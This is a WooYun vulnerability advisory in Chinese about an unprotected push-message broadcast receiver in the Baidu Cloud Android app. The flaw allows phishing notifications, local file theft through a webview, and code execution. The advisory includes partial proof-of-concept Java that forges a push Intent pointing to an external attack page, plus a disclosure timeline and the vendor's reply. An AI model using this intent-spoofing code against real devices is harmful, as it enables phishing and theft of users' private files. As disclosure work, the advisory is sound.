当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-039801

漏洞标题:百度云盘手机版钓鱼、信息泄露和代码执行高危漏洞三合一

相关厂商:百度

漏洞作者: Pentest.mobi

提交时间:2013-10-15 14:44

修复时间:2013-11-29 14:57

公开时间:2013-11-29 14:57

漏洞类型:命令执行

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-10-15: 细节已通知厂商并且等待厂商处理中
2013-10-15: 厂商已经确认,细节仅向厂商公开
2013-10-25: 细节向核心白帽子及相关领域专家公开
2013-11-04: 细节向普通白帽子公开
2013-11-14: 细节向实习白帽子公开
2013-11-29: 细节向公众公开

简要描述:

百度云盘手机版存在高危漏洞,恶意攻击者通过该漏洞可以对手机用户进行钓鱼欺骗,盗取用户隐私文件和信息,以百度云盘APP权限执行任何代码。

详细说明:

百度云盘有一个广播接收器没有对消息进行安全验证,通过发送恶意的消息,攻击者可以在用户手机通知栏上推送任意消息,点击消息后可以利用webview组件盗取本地隐私文件和执行任意代码。

漏洞证明:

测试版本:官方最新版5.1.0
存在漏洞的组件是:com.baidu.android.pushservice.action.MESSAGE
漏洞利用关键代码:

Intent i = new Intent();

i.setAction("com.baidu.android.pushservice.action.MESSAGE");


Bundle b = new Bundle();

try {


JSONObject jsobject = new JSONObject();


//1. phishing
JSONObject custom_content_js = new JSONObject();

jsobject.put("title", "百度云盘【漏洞你中奖了!】");
jsobject.put("description", "");
//jsobject.put("url", "http://bcscdn.baidu.com/netdisk/BaiduYun_5.1.0.apk");
jsobject.put("url", "http://drops.wooyun.org/webview.html");

JSONObject customcontent_js = new JSONObject();
customcontent_js.put("type", "1");
customcontent_js.put("msg_type", "resources_push");
customcontent_js.put("uk", "1");
customcontent_js.put("shareId", "1");
jsobject.put("custom_content", customcontent_js);



String cmd = jsobject.toString();

b.putByteArray("message", cmd.getBytes("UTF-8"));
} catch (Exception e) {
// TODO Auto-generated catch block
e.printStackTrace();
}


漏洞证明:

3.jpg


2.jpg

修复方案:

对恶意消息进行安全验证。

版权声明:转载请注明来源 Pentest.mobi@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-10-15 17:57

厂商回复:

感谢反馈,帮助百度云发现此问题,经验证,此问题无法远程利用,需要手机被安装恶意应用才可利用,百度云团队已启动修复工作,会尽快推出新版本,欢迎继续关注百度云。
--“百度,以你更安全”

最新状态:

暂无